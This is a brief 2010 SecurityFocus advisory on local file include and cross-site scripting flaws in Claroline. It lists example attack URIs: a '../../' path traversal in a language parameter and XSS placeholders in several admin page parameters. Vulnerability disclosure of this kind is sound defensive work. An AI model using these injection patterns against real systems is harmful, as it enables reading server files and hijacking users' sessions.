Claroline Local File Include and Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user to view a maliciously crafted URI.

The following example URIs are available:

http://www.example.com/inc/lib/languages.lib.php?language=../../[file]
http://www.example.com/admin/adminusers.php?dir=[XSS]
http://www.example.com/admin/adminusers.php?sort=[XSS]
http://www.example.com/admin/advancedUserSearch.php?action=[XSS]
http://www.example.com/admin/campusProblem.php?view=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus